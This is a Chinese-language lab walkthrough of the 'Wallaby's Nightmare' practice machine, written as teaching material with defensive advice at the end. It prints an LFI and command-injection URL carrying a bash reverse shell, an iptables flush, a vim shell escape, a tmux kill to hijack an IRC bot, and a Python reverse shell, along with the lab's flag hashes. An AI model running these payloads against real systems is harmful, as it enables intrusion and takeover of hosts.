Wallaby's Nightmare 渗透测试实战教学文档<\/h1>

1. 目标信息收集<\/h2>

1.1 初始扫描<\/h3>
使用Nmap进行初始扫描：<\/p>
nmap -p- -sC -sV 192.168.8.105 --min-rate 1000<\/span> -Pn
<\/span><\/span><\/code><\/pre>发现开放端口：<\/p>

TCP 22 (SSH)<\/li>
TCP 80 (HTTP)<\/li>
TCP 6667 (IRC)<\/li>
TCP 60080 (HTTP)<\/li>
<\/ul>
1.2 Web服务探测<\/h3>
发现60080端口存在Web服务，使用Arjun进行参数爆破：<\/p>
arjun -u http:\/\/192.168.8.105:60080
<\/span><\/span><\/code><\/pre>发现page<\/code>参数存在LFI漏洞：<\/p>
http:\/\/192.168.8.105:60080\/?page=etc\/shadow
<\/code><\/pre>
使用DIRB进行目录爆破：<\/p>
dirb "http:\/\/192.168.8.105:60080\/?page="<\/span>
<\/span><\/span><\/code><\/pre>发现mailer<\/code>端点：<\/p>
http:\/\/192.168.8.105:60080\/?page=mailer
<\/code><\/pre>
进一步爆破发现mail<\/code>参数：<\/p>
dirb "http:\/\/192.168.8.105:60080\/?page=mailer&mail="<\/span>
<\/span><\/span><\/code><\/pre>2. 初始访问<\/h2>
2.1 利用LFI+RCE获取Shell<\/h3>
通过mail<\/code>参数执行命令注入：<\/p>
http:\/\/192.168.8.105:60080\/?page=mailer&mail=%2fbin%2fbash+-c+%27bash+-i+%3E%26+%2fdev%2ftcp%2f192.168.8.107%2f10032+0%3E%261%27
<\/code><\/pre>
解码后实际执行的命令：<\/p>
\/bin\/bash -c 'bash -i >& \/dev\/tcp\/192.168.8.107\/10032 0>&1'<\/span>
<\/span><\/span><\/code><\/pre>2.2 获取初始凭证<\/h3>
找到local.txt内容：<\/p>
96e9dd72f028f2b2c894852ee056eb91
<\/code><\/pre>
3. 权限提升<\/h2>
3.1 绕过防火墙限制<\/h3>
两种方法：<\/p>

使用chisel端口转发<\/li>
直接清除防火墙规则<\/li>
<\/ol>
清除防火墙规则：<\/p>
sudo \/sbin\/iptables -L  # 查看规则<\/span>
<\/span><\/span>sudo \/sbin\/iptables --flush  # 清除规则<\/span>
<\/span><\/span><\/code><\/pre>3.2 利用IRC服务提权<\/h3>
3.2.1 连接IRC服务<\/h4>
使用irssi连接IRC服务：<\/p>
irssi -c 192.168.8.105
<\/span><\/span><\/code><\/pre>列出聊天室：<\/p>
\/list
<\/code><\/pre>
加入目标频道：<\/p>
\/join #wallabyschat
<\/code><\/pre>
3.2.2 冒充waldo用户<\/h4>
发现.run<\/code>命令需要waldo权限，先获取waldo shell：<\/p>
sudo -u waldo \/usr\/bin\/vim \/etc\/apache2\/sites-available\/000-default.conf
<\/span><\/span><\/code><\/pre>在vim中执行：<\/p>
:!bash
<\/code><\/pre>
3.2.3 接管IRC会话<\/h4>
查找并终止现有的tmux会话：<\/p>
ps aux | grep tmux
<\/span><\/span>pkill -9 tmux
<\/span><\/span><\/code><\/pre>在irssi中冒充waldo：<\/p>
\/nick waldo
<\/code><\/pre>
执行反弹shell命令：<\/p>
.run python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.8.107",10033));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("\/bin\/sh")'
<\/code><\/pre>
3.2.4 获取最终凭证<\/h4>
找到proof.txt内容：<\/p>
d41d8cd98f00b204e9800998ecf8427e
<\/code><\/pre>
4. 关键知识点总结<\/h2>


LFI漏洞利用<\/strong>：<\/p>

通过page<\/code>参数读取系统文件<\/li>
结合mailer<\/code>端点实现RCE<\/li>
<\/ul>
<\/li>

IRC服务利用<\/strong>：<\/p>

使用irssi客户端连接IRC服务<\/li>
通过会话劫持冒充特权用户<\/li>
利用IRC bot执行系统命令<\/li>
<\/ul>
<\/li>

权限提升技巧<\/strong>：<\/p>

通过sudo -u切换用户上下文<\/li>
利用vim的shell逃逸功能<\/li>
终止现有会话实现会话劫持<\/li>
<\/ul>
<\/li>

防火墙绕过<\/strong>：<\/p>

直接清除iptables规则<\/li>
替代方案使用端口转发<\/li>
<\/ul>
<\/li>

反弹Shell技术<\/strong>：<\/p>

多种反弹shell方法（bash、python）<\/li>
使用pty.spawn获取完整交互式shell<\/li>
<\/ul>
<\/li>
<\/ol>
5. 防御建议<\/h2>


修复LFI漏洞：<\/p>

严格过滤用户输入<\/li>
使用白名单限制文件访问<\/li>
<\/ul>
<\/li>

加固IRC服务：<\/p>

限制.run命令的使用权限<\/li>
实现严格的用户认证<\/li>
<\/ul>
<\/li>

系统加固：<\/p>

限制sudo权限<\/li>
监控关键进程（如tmux）<\/li>
配置防火墙最小权限规则<\/li>
<\/ul>
<\/li>

安全监控：<\/p>

监控异常进程创建<\/li>
记录IRC聊天室活动<\/li>
<\/ul>
<\/li>
<\/ol>